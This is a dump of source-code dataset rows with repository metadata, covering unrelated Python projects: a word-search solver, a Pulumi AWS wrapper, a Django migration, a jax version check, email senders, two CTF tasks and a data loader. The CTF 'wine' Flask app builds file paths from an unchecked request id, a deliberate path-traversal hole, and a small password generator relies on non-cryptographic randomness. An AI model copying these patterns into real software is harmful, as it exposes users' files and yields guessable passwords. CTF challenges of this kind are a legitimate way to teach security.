            if user.is_staff():
                return interstitial
            # BUG FIX: previously both branches returned the interstitial,
            # leaking draft interstitials to non-staff users.
            return None
        return interstitial
| 878 | 21 | 76 |
c4e22ffc44e425009a479fb44c3a678354488d3c | 3,959 | py | Python | wordsearch/main.py | maxrothman/wordsearch | 026187c994a4510d32f54223988be0787ca698ce | [
"MIT"
] | null | null | null | wordsearch/main.py | maxrothman/wordsearch | 026187c994a4510d32f54223988be0787ca698ce | [
"MIT"
] | null | null | null | wordsearch/main.py | maxrothman/wordsearch | 026187c994a4510d32f54223988be0787ca698ce | [
"MIT"
] | null | null | null | # Ensure that accidentally-raised StopIterations are transformed to RuntimeErrors
# Livin' in the future!
from __future__ import generator_stop
from wordsearch.board import Board
import string, random
def start_board_run(start, direction, board):
  """
  A generator that yields successive values of "board" starting from "start"
  and moving in "direction", ending (StopIteration) once the walk crosses
  the edge of the board.

  "direction" is added as a vector to the current position on every
  iteration, so start = (0,0) with direction = (1,1) yields the letters at
  (0,0), (1,1), (2,2), etc.

  Args:
    start: a 2-tuple of ints (x,y) for which coordinates to start at in "board"
    direction: a 2-tuple of ints (x,y) of which direction to iterate in.
      Both x and y should be one of (-1, 0, 1) and (0, 0) is invalid.
    board: a Board to search in

  Yields: next letter in run (type depends on board value type)
  """
  if any(d not in (-1, 0, 1) for d in direction):
    raise ValueError('All values in direction should be one of (-1, 0, 1), got {}'.format(direction))
  if direction == (0, 0):
    raise ValueError("Direction cannot be (0, 0)")
  pos = (start[0], start[1])
  while True:
    try:
      value = board[pos[0], pos[1]]
    except IndexError:
      # walked off the board: finish the generator
      return
    yield value
    pos = (pos[0] + direction[0], pos[1] + direction[1])
def start_trie_search(root):
  """
  A generator that walks down a trie one letter at a time. After priming it
  with next() (or .send(None)), each letter passed via .send(letter) does
  the following:

  - if the letter is not a child of the current node, a StopIteration is
    raised
  - otherwise that child becomes the current node and the generator yields
    whether it ends a word

  Args:
    root: root TrieNode to begin the search with

  Yields: whether the current node ends a word (bool)
  """
  node = root
  while True:
    received = yield node.word_end
    if received not in node.children:
      # dead end in the trie: finish the generator
      return
    node = node.children[received]
# List of x,y vectors (tuples) for all directions a word can be found in, i.e. forwards
# or backwards in rows or columns, and on diagonals.
# E.g. (0, 1) = down, (1, 1) = diagonal down-right, (1, 0) = right, ...
_directions = [(x, y) for x in range(-1, 2) for y in range (-1, 2) if not (x == 0 and y == 0)]
def search_board(board, rootnode):
  """
  A generator that searches for words in "board" using the trie rooted by "rootnode"
  and yields the words found.

  Every board cell is tried as a starting point in all eight directions; each
  run is advanced in lockstep with the trie, and the longest prefix of the run
  that completes a word (if any) is yielded.

  Args:
    board: a Board to search
    rootnode: a TrieNode that roots a trie used to identify words

  Yields: a word found in board (string)
  """
  for x, y, letter in board:
    for direction in _directions:
      board_run = start_board_run((x, y), direction, board)
      trie_search = start_trie_search(rootnode)
      next(trie_search) #Prime trie_search
      letters = []          # letters collected along this run so far
      last_word_end = None  # length of the longest completed word, if any
      # Try advancing both generators until one runs out. That means we've either hit
      # the edge of the board or the bottom of the trie.
      #
      # Keep track of the letters as we go and the location of the last-found
      # word_end flag in the trie. When we hit the end, grab all the letters until
      # the last-found flag.
      try:
        while True:
          letter = next(board_run)  # note: shadows the `letter` unpacked above
          letters.append(letter)
          word_end = trie_search.send(letter)
          if word_end:
            last_word_end = len(letters)
      except StopIteration:
        pass
      if last_word_end is not None:
        yield ''.join(letters[:last_word_end])
def random_board(width, height):
  """
  Return a Board of random lowercase letters.

  Args:
    width: width of the board
    height: height of the board
  """
  rows = []
  for _ in range(height):
    rows.append([random.choice(string.ascii_lowercase) for _ in range(width)])
  return Board(rows)
# Livin' in the future!
from __future__ import generator_stop
from wordsearch.board import Board
import string, random
def start_board_run(start, direction, board):
  """
  A generator that yields successive values of "board" starting from "start" and
  moving in "direction", raising a StopIteration when the edge of the board is
  crossed.

  "direction" is added as a vector to the current position on every iteration.
  For example, for start = (0,0) and direction = (1,1), this will yield the letters
  at (0,0), (1,1), (2,2), etc.

  Args:
    start: a 2-tuple of ints (x,y) for which coordinates to start at in "board"
    direction: a 2-tuple of ints (x,y) of which direction to iterate in.
      Both x and y should be one of (-1, 0, 1) and (0, 0) is invalid.
    board: a Board to search in

  Yields: next letter in run (type depends on board value type)

  Raises:
    ValueError: if direction has a component outside (-1, 0, 1) or is (0, 0);
      being generator code, this surfaces on the first next()/send(None).
  """
  # validate the step vector up front
  if not all(d in (-1, 0, 1) for d in direction):
    raise ValueError('All values in direction should be one of (-1, 0, 1), got {}'.format(direction))
  if direction == (0, 0):
    raise ValueError("Direction cannot be (0, 0)")
  cur_pt = start
  try:
    while True:
      yield board[cur_pt[0], cur_pt[1]]
      # step one cell further along the direction vector
      cur_pt = (cur_pt[0] + direction[0], cur_pt[1] + direction[1])
  except IndexError:
    # walked off the board -- end the generator (StopIteration for the caller)
    return
def start_trie_search(root):
  """
  A generator that progressively searches down a trie. When given a letter with
  "trie_search.send(letter)", it does the following:

  - If the letter is not a child of the current node, raise a StopIteration
  - If the letter is a child of the current node, select it, and yield whether it
    ends a word

  You must "prime" the generator by calling next() or .send(None) on it
  once before .send()-ing the first letter.

  Args:
    root: root TrieNode to begin the search with

  Yields: whether the letter ends a word (bool)
  """
  cur_node = root
  letter = None  # last letter received from the consumer
  while True:
    # yield the word-end flag of the node we are on, receive the next letter
    letter = yield cur_node.word_end
    try:
      cur_node = cur_node.children[letter]
    except KeyError:
      # the letter is not a child of the current node: stop the search
      return
# All eight (x, y) step vectors a word can run along: forwards or backwards
# in rows or columns, and on diagonals.
# E.g. (0, 1) = down, (1, 1) = diagonal down-right, (1, 0) = right, ...
_directions = [(dx, dy) for dx in (-1, 0, 1) for dy in (-1, 0, 1) if (dx, dy) != (0, 0)]
def search_board(board, rootnode):
  """
  A generator that searches for words in "board" using the trie rooted by
  "rootnode" and yields the words found.

  Every cell is used as a starting point; from each one a run is walked in
  all eight directions while simultaneously descending the trie, and the
  longest prefix of the run that completes a word (if any) is yielded.

  Args:
    board: a Board to search
    rootnode: a TrieNode that roots a trie used to identify words

  Yields: a word found in board (string)
  """
  for col, row, _ in board:
    for step in _directions:
      run = start_board_run((col, row), step, board)
      matcher = start_trie_search(rootnode)
      next(matcher)  # prime the trie walker
      collected = []
      best_end = None
      # Walk the board run and the trie in lockstep until either the edge of
      # the board (run exhausted) or the bottom of the trie (matcher raises
      # StopIteration), remembering where the last completed word ended.
      try:
        for ch in run:
          collected.append(ch)
          if matcher.send(ch):
            best_end = len(collected)
      except StopIteration:
        pass
      if best_end is not None:
        yield ''.join(collected[:best_end])
def random_board(width, height):
  """
  Build a width x height Board where every cell holds a random lowercase
  ascii letter.

  Args:
    width: width of the board
    height: height of the board
  """
  grid = [[random.choice(string.ascii_lowercase) for _ in range(width)]
          for _ in range(height)]
  return Board(grid)
5dd5b3aaa3549ee4e2e1c9dfd185b4953bf00728 | 3,575 | py | Python | sdk/python/pulumi_aws/ebs/get_snapshot_ids.py | JakeGinnivan/pulumi-aws | c91ef78932964ac74eda7f5da81f65b0f1798c93 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/ebs/get_snapshot_ids.py | JakeGinnivan/pulumi-aws | c91ef78932964ac74eda7f5da81f65b0f1798c93 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/ebs/get_snapshot_ids.py | JakeGinnivan/pulumi-aws | c91ef78932964ac74eda7f5da81f65b0f1798c93 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
# NOTE: auto-generated by the Pulumi Terraform bridge (tfgen); edits here are
# lost on regeneration. In the complete generated module this class also
# defines an __init__ storing filters/id/ids/owners/restorable_by_user_ids.
class GetSnapshotIdsResult:
    """
    A collection of values returned by getSnapshotIds.
    """
    # pylint: disable=using-constant-test
def get_snapshot_ids(filters=None,owners=None,restorable_by_user_ids=None,opts=None):
    """
    Use this data source to get a list of EBS Snapshot IDs matching the specified
    criteria.

    ## Example Usage

    ```python
    import pulumi
    import pulumi_aws as aws

    ebs_volumes = aws.ebs.get_snapshot_ids(filters=[
        {
            "name": "volume-size",
            "values": ["40"],
        },
        {
            "name": "tag:Name",
            "values": ["Example"],
        },
    ],
    owners=["self"])
    ```

    :param list filters: One or more name/value pairs to filter off of. There are
           several valid keys; for a full reference, check out
           describe-volumes in the AWS CLI reference.
    :param list owners: Returns the snapshots owned by the specified owner id. Multiple owners can be specified.
    :param list restorable_by_user_ids: One or more AWS accounts IDs that can create volumes from the snapshot.

    The **filters** object supports the following:

      * `name` (`str`)
      * `values` (`list`)
    """
    # Build the raw argument dict in the wire format the provider expects
    # (note the camelCase key for restorable_by_user_ids).
    __args__ = dict()
    __args__['filters'] = filters
    __args__['owners'] = owners
    __args__['restorableByUserIds'] = restorable_by_user_ids
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        # default to this SDK's version when the caller did not pin one
        opts.version = utilities.get_version()
    # synchronous invoke against the AWS provider; .value is the resolved result
    __ret__ = pulumi.runtime.invoke('aws:ebs/getSnapshotIds:getSnapshotIds', __args__, opts=opts).value

    return AwaitableGetSnapshotIdsResult(
        filters=__ret__.get('filters'),
        id=__ret__.get('id'),
        ids=__ret__.get('ids'),
        owners=__ret__.get('owners'),
        restorable_by_user_ids=__ret__.get('restorableByUserIds'))
| 34.708738 | 112 | 0.643077 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class GetSnapshotIdsResult:
    """
    A collection of values returned by getSnapshotIds.
    """
    def __init__(__self__, filters=None, id=None, ids=None, owners=None, restorable_by_user_ids=None):
        # Generated validation: each field is type-checked only when truthy,
        # then stored verbatim on the instance.
        if filters and not isinstance(filters, list):
            raise TypeError("Expected argument 'filters' to be a list")
        __self__.filters = filters
        if id and not isinstance(id, str):
            raise TypeError("Expected argument 'id' to be a str")
        __self__.id = id
        """
        The provider-assigned unique ID for this managed resource.
        """
        if ids and not isinstance(ids, list):
            raise TypeError("Expected argument 'ids' to be a list")
        __self__.ids = ids
        if owners and not isinstance(owners, list):
            raise TypeError("Expected argument 'owners' to be a list")
        __self__.owners = owners
        if restorable_by_user_ids and not isinstance(restorable_by_user_ids, list):
            raise TypeError("Expected argument 'restorable_by_user_ids' to be a list")
        __self__.restorable_by_user_ids = restorable_by_user_ids
class AwaitableGetSnapshotIdsResult(GetSnapshotIdsResult):
    # pylint: disable=using-constant-test
    def __await__(self):
        # The dead `if False: yield` makes __await__ a generator function so
        # instances can be awaited; it never actually suspends and completes
        # immediately with a plain GetSnapshotIdsResult copy of the fields.
        if False:
            yield self
        return GetSnapshotIdsResult(
            filters=self.filters,
            id=self.id,
            ids=self.ids,
            owners=self.owners,
            restorable_by_user_ids=self.restorable_by_user_ids)
def get_snapshot_ids(filters=None,owners=None,restorable_by_user_ids=None,opts=None):
    """
    Use this data source to get a list of EBS Snapshot IDs matching the specified
    criteria.

    ## Example Usage

    ```python
    import pulumi
    import pulumi_aws as aws

    ebs_volumes = aws.ebs.get_snapshot_ids(filters=[
        {
            "name": "volume-size",
            "values": ["40"],
        },
        {
            "name": "tag:Name",
            "values": ["Example"],
        },
    ],
    owners=["self"])
    ```

    :param list filters: One or more name/value pairs to filter off of. There are
           several valid keys; for a full reference, check out
           describe-volumes in the AWS CLI reference.
    :param list owners: Returns the snapshots owned by the specified owner id. Multiple owners can be specified.
    :param list restorable_by_user_ids: One or more AWS accounts IDs that can create volumes from the snapshot.

    The **filters** object supports the following:

      * `name` (`str`)
      * `values` (`list`)
    """
    # Build the raw argument dict in the wire format the provider expects
    # (note the camelCase key for restorable_by_user_ids).
    __args__ = dict()
    __args__['filters'] = filters
    __args__['owners'] = owners
    __args__['restorableByUserIds'] = restorable_by_user_ids
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        # default to this SDK's version when the caller did not pin one
        opts.version = utilities.get_version()
    # synchronous invoke against the AWS provider; .value is the resolved result
    __ret__ = pulumi.runtime.invoke('aws:ebs/getSnapshotIds:getSnapshotIds', __args__, opts=opts).value

    return AwaitableGetSnapshotIdsResult(
        filters=__ret__.get('filters'),
        id=__ret__.get('id'),
        ids=__ret__.get('ids'),
        owners=__ret__.get('owners'),
        restorable_by_user_ids=__ret__.get('restorableByUserIds'))
| 1,253 | 37 | 74 |
94aa194bc312507a4ff1a92f580f44183d5dd89f | 1,067 | py | Python | tasks/broken-transmitter/exploit.py | chankruze/qctf-school-2018 | 1e732cf264ee0a94bc2fc1fd8cf3a20660d57605 | [
"MIT"
] | null | null | null | tasks/broken-transmitter/exploit.py | chankruze/qctf-school-2018 | 1e732cf264ee0a94bc2fc1fd8cf3a20660d57605 | [
"MIT"
] | null | null | null | tasks/broken-transmitter/exploit.py | chankruze/qctf-school-2018 | 1e732cf264ee0a94bc2fc1fd8cf3a20660d57605 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import re
import requests
from time import sleep
from argparse import ArgumentParser
if __name__ == '__main__':
    # NOTE(review): get_args() is expected to be defined earlier in this file.
    args = get_args()
    data = ''
    pattern = 'QCTF{.*?}'
    # Poll the transmitter endpoint until the accumulated text contains a flag.
    while not re.search(pattern, data):
        update = requests.get('%s/%s/' % (args.url, args.token)).text
        # the page carries space-separated hex character codes inside a <div>
        hexcode = re.search('\>([\w\s]*?)\<\/div', update).group(1)
        if not hexcode:
            continue
        # decode the hex codes into text and append any new fragment
        text = ''.join([chr(int(code, 16)) for code in hexcode.split(' ')])
        if text not in data:
            data += text
        print('Downloaded text length: %d' % len(data))
        sleep(args.timeout)
    print(data)
    print()
    print('Found flag!')
    print(re.search(pattern, data).group(0))
| 29.638889 | 103 | 0.612933 | #!/usr/bin/python3
import re
import requests
from time import sleep
from argparse import ArgumentParser
def get_args():
    """Parse the command line: required --url and --token, optional --timeout.

    :return: argparse.Namespace with url, token and timeout attributes
    """
    parser = ArgumentParser()
    parser.add_argument('--url', help='server address (with http)', required=True)
    parser.add_argument('--token', help='your token', required=True)
    # FIX: the help text claimed a default of 10 while the actual default is 5;
    # make the message match the behaviour.
    parser.add_argument('--timeout', help='timeout between requests (default 5)', type=int, default=5)
    return parser.parse_args()
if __name__ == '__main__':
    args = get_args()
    data = ''
    pattern = 'QCTF{.*?}'
    # Poll the transmitter endpoint until the accumulated text contains a flag.
    while not re.search(pattern, data):
        update = requests.get('%s/%s/' % (args.url, args.token)).text
        # the page carries space-separated hex character codes inside a <div>
        hexcode = re.search('\>([\w\s]*?)\<\/div', update).group(1)
        if not hexcode:
            continue
        # decode the hex codes into text and append any new fragment
        text = ''.join([chr(int(code, 16)) for code in hexcode.split(' ')])
        if text not in data:
            data += text
        print('Downloaded text length: %d' % len(data))
        sleep(args.timeout)
    print(data)
    print()
    print('Found flag!')
    print(re.search(pattern, data).group(0))
| 311 | 0 | 23 |
3613506af86ab39ddcebe6227a8d8d4a204e0b51 | 1,031 | py | Python | mayan/apps/documents/migrations/0025_auto_20150718_0742.py | nattangwiwat/Mayan-EDMS-recitation | fcf16afb56eae812fb99144d65ae1ae6749de0b7 | [
"Apache-2.0"
] | 343 | 2015-01-05T14:19:35.000Z | 2018-12-10T19:07:48.000Z | mayan/apps/documents/migrations/0025_auto_20150718_0742.py | nattangwiwat/Mayan-EDMS-recitation | fcf16afb56eae812fb99144d65ae1ae6749de0b7 | [
"Apache-2.0"
] | 191 | 2015-01-03T00:48:19.000Z | 2018-11-30T09:10:25.000Z | mayan/apps/documents/migrations/0025_auto_20150718_0742.py | nattangwiwat/Mayan-EDMS-recitation | fcf16afb56eae812fb99144d65ae1ae6749de0b7 | [
"Apache-2.0"
] | 257 | 2019-05-14T10:26:37.000Z | 2022-03-30T03:37:36.000Z | import pycountry
from django.db import migrations
| 32.21875 | 87 | 0.669253 | import pycountry
from django.db import migrations
def operation_change_bibliographic_to_terminology(apps, schema_editor):
    """Data migration: convert each Document's language code from the
    ISO 639-2 bibliographic form to the terminology form using pycountry.

    Runs against the database alias the migration is applied to; documents
    whose lookup fails are reset to 'eng'.
    """
    Document = apps.get_model(app_label='documents', model_name='Document')
    for document in Document.objects.using(alias=schema_editor.connection.alias).all():
        try:
            language = pycountry.languages.get(bibliographic=document.language)
        except KeyError:
            # The pycountry version used doesn't support the 'bibliographic'
            # key. Reset the document's language to English.
            # GitHub issue #250
            # https://github.com/mayan-edms/mayan-edms/issues/250
            document.language = 'eng'
            document.save()
        else:
            document.language = language.terminology
            document.save()
class Migration(migrations.Migration):
    """Applies the bibliographic -> terminology language-code conversion."""
    dependencies = [
        ('documents', '0024_auto_20150715_0714'),
    ]
    operations = [
        migrations.RunPython(code=operation_change_bibliographic_to_terminology),
    ]
| 730 | 202 | 46 |
edfc96ae8b85b7ba7a88f0bebf54e995343650f3 | 550 | py | Python | nisyscfg/types.py | tkrebes/nisyscfg-python | 080cec262a30bfc2b00f703996d2ad896578a67a | [
"MIT"
] | 2 | 2021-12-17T15:41:35.000Z | 2021-12-17T15:41:37.000Z | nisyscfg/types.py | tkrebes/nisyscfg-python | 080cec262a30bfc2b00f703996d2ad896578a67a | [
"MIT"
] | 3 | 2020-12-08T16:43:36.000Z | 2022-01-23T15:50:02.000Z | nisyscfg/types.py | tkrebes/nisyscfg-python | 080cec262a30bfc2b00f703996d2ad896578a67a | [
"MIT"
] | null | null | null | # This file is code generated
import ctypes
simple_string = ctypes.c_char * 1024
UInt64 = ctypes.c_ulonglong
ResourceHandle = ctypes.c_void_p
EnumResourceHandle = ctypes.c_void_p
EnumSoftwareFeedHandle = ctypes.c_void_p
SessionHandle = ctypes.c_void_p
TimestampUTC = ctypes.c_uint * 4
EnumSoftwareComponentHandle = ctypes.c_void_p
EnumDependencyHandle = ctypes.c_void_p
SoftwareSetHandle = ctypes.c_void_p
FilterHandle = ctypes.c_void_p
EnumExpertHandle = ctypes.c_void_p
EnumSystemHandle = ctypes.c_void_p
EnumSoftwareSetHandle = ctypes.c_void_p
| 27.5 | 45 | 0.84 | # This file is code generated
import ctypes
simple_string = ctypes.c_char * 1024
UInt64 = ctypes.c_ulonglong
ResourceHandle = ctypes.c_void_p
EnumResourceHandle = ctypes.c_void_p
EnumSoftwareFeedHandle = ctypes.c_void_p
SessionHandle = ctypes.c_void_p
TimestampUTC = ctypes.c_uint * 4
EnumSoftwareComponentHandle = ctypes.c_void_p
EnumDependencyHandle = ctypes.c_void_p
SoftwareSetHandle = ctypes.c_void_p
FilterHandle = ctypes.c_void_p
EnumExpertHandle = ctypes.c_void_p
EnumSystemHandle = ctypes.c_void_p
EnumSoftwareSetHandle = ctypes.c_void_p
| 0 | 0 | 0 |
66871c8115c9f515390aa21924d566cce16565d8 | 1,248 | py | Python | web/wine/app.py | afnom/what-the-ctf-2020 | 9df5a18d911235d483383762b2fc6426ea95f239 | [
"MIT"
] | null | null | null | web/wine/app.py | afnom/what-the-ctf-2020 | 9df5a18d911235d483383762b2fc6426ea95f239 | [
"MIT"
] | null | null | null | web/wine/app.py | afnom/what-the-ctf-2020 | 9df5a18d911235d483383762b2fc6426ea95f239 | [
"MIT"
] | null | null | null | import os
import random
import string
from flask import Flask, render_template, request, redirect, url_for
app = Flask(__name__)
COMPLAINTS_DIR = 'complaints'
os.makedirs(COMPLAINTS_DIR, exist_ok=True)
@app.route('/')
@app.route('/complaint', methods=['GET'])
@app.route('/complaint', methods=['POST'])
if __name__ == '__main__':
app.run(host='0.0.0.0', port=4000)
| 26 | 83 | 0.657051 | import os
import random
import string
from flask import Flask, render_template, request, redirect, url_for
app = Flask(__name__)
COMPLAINTS_DIR = 'complaints'
os.makedirs(COMPLAINTS_DIR, exist_ok=True)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/complaint', methods=['GET'])
def complaint():
i = request.args.get('id')
if i is None:
return render_template('error.html', message="no complaint specified"), 400
path = make_path(i)
print(path)
try:
with open(path) as f:
complaint = f.read()
except FileNotFoundError:
return render_template('error.html', message=f"{path} not found"), 404
return render_template('complaint.html', content=complaint)
@app.route('/complaint', methods=['POST'])
def make_complaint():
i = ''.join([random.choice(string.ascii_letters) for _ in range(10)])
content = request.form.get('content')
path = make_path(i)
with open(path, 'w') as f:
f.write(content)
return redirect(url_for('complaint') + '?id=' + i)
def make_path(i):
path = os.path.join(COMPLAINTS_DIR, i) + '.txt'
path = path[:40]
return path
if __name__ == '__main__':
app.run(host='0.0.0.0', port=4000)
| 785 | 0 | 89 |
36f3d68a22be7887c4f965e6b8da30455045f47a | 1,482 | py | Python | sky_visitor/template_email_senders.py | Apkawa/django-sky-visitor | 817f850a7ca4e3c7f2568ffdd2c2ddd0cf47cdad | [
"Apache-2.0"
] | null | null | null | sky_visitor/template_email_senders.py | Apkawa/django-sky-visitor | 817f850a7ca4e3c7f2568ffdd2c2ddd0cf47cdad | [
"Apache-2.0"
] | null | null | null | sky_visitor/template_email_senders.py | Apkawa/django-sky-visitor | 817f850a7ca4e3c7f2568ffdd2c2ddd0cf47cdad | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from django.template import Template, Context, loader, TemplateDoesNotExist
from django.contrib.sites.models import Site
from django.core.mail import EmailMultiAlternatives
from django.template.defaultfilters import striptags
| 32.933333 | 75 | 0.687584 | # -*- coding: utf-8 -*-
from django.template import Template, Context, loader, TemplateDoesNotExist
from django.contrib.sites.models import Site
from django.core.mail import EmailMultiAlternatives
from django.template.defaultfilters import striptags
class BaseTemplateSender(object):
    """Interface for template-based email senders; subclasses implement send()."""
    def send(self, template_name, to_address, text_template_name=None,
             subject='', context=None, from_email=None, **kwargs):
        # Abstract by convention: the base implementation is a no-op.
        pass
class DjangoTemplateSender(BaseTemplateSender):
    """Sends a multipart (HTML + plain-text) email rendered from Django templates."""
    def render(self, template_name, context):
        # Render a template loaded from the configured template directories.
        t = loader.get_template(template_name)
        return t.render(Context(context))
    def _render_from_string(self, s, context):
        # Render an inline template string (used for the subject line).
        t = Template(s)
        return t.render(Context(context))
    def send(self, template_name, to_address, text_template_name=None,
             subject='', context=None, from_email=None, **kwargs):
        """Render and send the message; returns the result of msg.send().

        The HTML body comes from *template_name*; the plain-text alternative
        comes from *text_template_name*, falling back to a tag-stripped copy
        of the HTML when that template does not exist. *subject* is itself
        treated as a template string.
        """
        context = context or {}
        html_body = self.render(template_name, context)
        try:
            text_body = self.render(text_template_name, context)
        except TemplateDoesNotExist:
            text_body = striptags(html_body)
        subject = self._render_from_string(subject, context)
        # Allow a single recipient to be passed as a plain string.
        # NOTE(review): `unicode` only exists on Python 2; under Python 3 this
        # line raises NameError — confirm the intended interpreter version.
        if isinstance(to_address, (str, unicode)):
            to_address = (to_address,)
        msg = EmailMultiAlternatives(subject=subject, body=text_body,
                                     from_email=from_email, to=to_address)
        msg.attach_alternative(html_body, "text/html")
        return msg.send()
| 1,035 | 38 | 152 |
6a0b2d97f3797679b5ea29d4d7c1f4d1cb65ce03 | 387 | py | Python | 2019/exam_solutions-2019December/question8.py | ati-ozgur/course-python | 38237d120043c07230658b56dc3aeb01c3364933 | [
"Apache-2.0"
] | 1 | 2021-02-04T16:59:11.000Z | 2021-02-04T16:59:11.000Z | 2019/exam_solutions-2019December/question8.py | ati-ozgur/course-python | 38237d120043c07230658b56dc3aeb01c3364933 | [
"Apache-2.0"
] | null | null | null | 2019/exam_solutions-2019December/question8.py | ati-ozgur/course-python | 38237d120043c07230658b56dc3aeb01c3364933 | [
"Apache-2.0"
] | 1 | 2019-10-30T14:37:48.000Z | 2019-10-30T14:37:48.000Z | import string
import random as rnd
for u in range(1000):
p1 = random_password()
print(p1)
| 24.1875 | 56 | 0.666667 | import string
import random as rnd
def random_password(length = 12):
password = ""
max = len(string.ascii_uppercase)
for index in range(length):
random_num = rnd.randint(1,max-1)
random_char = string.ascii_uppercase[random_num]
password = password + random_char
return password
for u in range(1000):
p1 = random_password()
print(p1)
| 266 | 0 | 22 |
0a5eb05ea3b413e02f36b8ed15446ad917f429ca | 1,905 | py | Python | jax/lib/__init__.py | jonasrauber/jax | 7cbd58b6c6f910e1d7b762d7ed51a057be138976 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | jax/lib/__init__.py | jonasrauber/jax | 7cbd58b6c6f910e1d7b762d7ed51a057be138976 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | jax/lib/__init__.py | jonasrauber/jax | 7cbd58b6c6f910e1d7b762d7ed51a057be138976 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This module is largely a wrapper around `jaxlib` that performs version
# checking on import.
import jaxlib
_minimum_jaxlib_version = (0, 1, 31)
try:
from jaxlib import version as jaxlib_version
except:
# jaxlib is too old to have version number.
msg = 'This version of jax requires jaxlib version >= {}.'
raise ImportError(msg.format('.'.join(map(str, _minimum_jaxlib_version))))
version = tuple(int(x) for x in jaxlib_version.__version__.split('.'))
# Check the jaxlib version before importing anything else from jaxlib.
_check_jaxlib_version()
from jaxlib import xla_client
from jaxlib import xrt
from jaxlib import lapack
from jaxlib import pytree
from jaxlib import cusolver
| 35.943396 | 80 | 0.706037 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This module is largely a wrapper around `jaxlib` that performs version
# checking on import.
import jaxlib
_minimum_jaxlib_version = (0, 1, 31)
try:
from jaxlib import version as jaxlib_version
except:
# jaxlib is too old to have version number.
msg = 'This version of jax requires jaxlib version >= {}.'
raise ImportError(msg.format('.'.join(map(str, _minimum_jaxlib_version))))
version = tuple(int(x) for x in jaxlib_version.__version__.split('.'))
# Check the jaxlib version before importing anything else from jaxlib.
def _check_jaxlib_version():
  """Fail fast with a helpful error when the installed jaxlib is too old."""
  if version >= _minimum_jaxlib_version:
    return
  message = 'jaxlib is version {}, but this version of jax requires version {}.'
  if version == (0, 1, 23):
    # This particular release was only shipped as a manylinux2010 wheel,
    # which very old pip versions cannot resolve.
    message += ('\n\nA common cause of this error is that you installed jaxlib '
                'using pip, but your version of pip is too old to support '
                'manylinux2010 wheels. Try running:\n\n'
                'pip install --upgrade pip\n'
                'pip install --upgrade jax jaxlib\n')
  installed = '.'.join(map(str, version))
  required = '.'.join(map(str, _minimum_jaxlib_version))
  raise ValueError(message.format(installed, required))
_check_jaxlib_version()
from jaxlib import xla_client
from jaxlib import xrt
from jaxlib import lapack
from jaxlib import pytree
from jaxlib import cusolver
| 610 | 0 | 22 |
fbf78c1bb99660c1fb41b25072ddb3f5ee24fe9c | 1,178 | py | Python | QBG/DataLoader/loaders/index_loader.py | GYMS-PKU/Daily-Frequency-Quant | 808eda9930efecff04ecf98abf617404cadd0003 | [
"MIT"
] | 3 | 2021-11-21T04:35:04.000Z | 2022-03-04T09:19:53.000Z | QBG/DataLoader/loaders/index_loader.py | GYMS-PKU/Daily-Frequency-Quant | 808eda9930efecff04ecf98abf617404cadd0003 | [
"MIT"
] | null | null | null | QBG/DataLoader/loaders/index_loader.py | GYMS-PKU/Daily-Frequency-Quant | 808eda9930efecff04ecf98abf617404cadd0003 | [
"MIT"
] | 5 | 2021-10-03T00:00:22.000Z | 2022-03-07T09:02:00.000Z | # Copyright (c) 2022 Dai HBG
"""
获得日频指数成分股数据
日志
2022-01-05
- init,迁移原本功能
2022-01-08
- 更新:传入dates
- 增量更新
2022-01-11
- 更新:新增多种指数
"""
from jqdatasdk import *
import os
import pickle
import numpy as np
| 28.731707 | 91 | 0.596774 | # Copyright (c) 2022 Dai HBG
"""
获得日频指数成分股数据
日志
2022-01-05
- init,迁移原本功能
2022-01-08
- 更新:传入dates
- 增量更新
2022-01-11
- 更新:新增多种指数
"""
from jqdatasdk import *
import os
import pickle
import numpy as np
def get_index(dates: np.array, data_path: str):
    """Fetch and cache daily index-constituent sets for each date.

    For every date in *dates*, query jqdatasdk for the constituent stocks of
    several Chinese market indices and pickle the result to
    ``{data_path}/StockDailyData/{date}/index_dic.pkl``. Dates whose pickle
    already exists are skipped (incremental update).

    :param dates: iterable of dates (converted with str() for directory names)
    :param data_path: root directory containing StockDailyData/
    """
    existing = set(os.listdir('{}/StockDailyData'.format(data_path)))
    print('getting index data...')
    for date in dates:
        if str(date) not in existing:
            os.makedirs('{}/StockDailyData/{}'.format(data_path, date))
        files = os.listdir('{}/StockDailyData/{}'.format(data_path, date))
        # Incremental update: the file written below is named 'index_dic.pkl',
        # so that exact name must be checked. The previous check for
        # 'index_dic' (no extension) never matched, making the skip logic
        # dead code and re-downloading every date on every run.
        if 'index_dic.pkl' in files:
            print('{} done.'.format(date))
            continue
        index_dic = {'ZZ500': set(get_index_stocks('000905.XSHG', date=date)),  # CSI 500
